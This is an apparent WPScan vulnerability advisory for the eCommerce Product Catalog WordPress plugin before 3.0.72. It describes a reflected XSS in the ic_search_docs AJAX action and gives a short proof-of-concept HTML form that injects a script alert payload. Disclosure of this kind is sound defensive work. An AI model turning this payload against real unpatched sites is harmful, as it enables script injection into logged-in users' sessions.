eCommerce Product Catalog Plugin for WordPress < 3.0.72 – Reflected XSS via AJAX | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action available to any authenticated users, such as subscriber, leading to a Reflected Cross-Site Scripting

Proof of Concept

Make a logged in user open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=ic_search_docs" method="POST">
    <input type="text" name="term" value="<script>alert(/XSS/)</script>">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

ecommerce-product-catalog

Fixed in 3.0.72

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

751aaef4-af74-45bd-93d8-9ec5573556a1

Timeline

Publicly Published

2022-10-17 (about 3 years ago)

Added

2022-10-17 (about 3 years ago)

Last Updated

2022-10-17 (about 3 years ago)

Other

Published

Title

Published

2025-01-07

Title

TRUSTist REVIEWer <= 2.0 - Reflected Cross-Site Scripting

Published

2024-07-24

Title

Quiz Maker <= 6.5.9.8 - Admin+ Stored XSS

Published

2022-12-15

Title

WP CSV <= 1.8.0.0 - Reflected XSS via CSV Import

Published

2014-08-01

Title

Twitget 3.3.1 - twitget.php twitget_consumer_key Stored XSS

Published

2024-01-10

Title

Shortcodes Finder < 1.5.5 - Reflected Cross-Site Scripting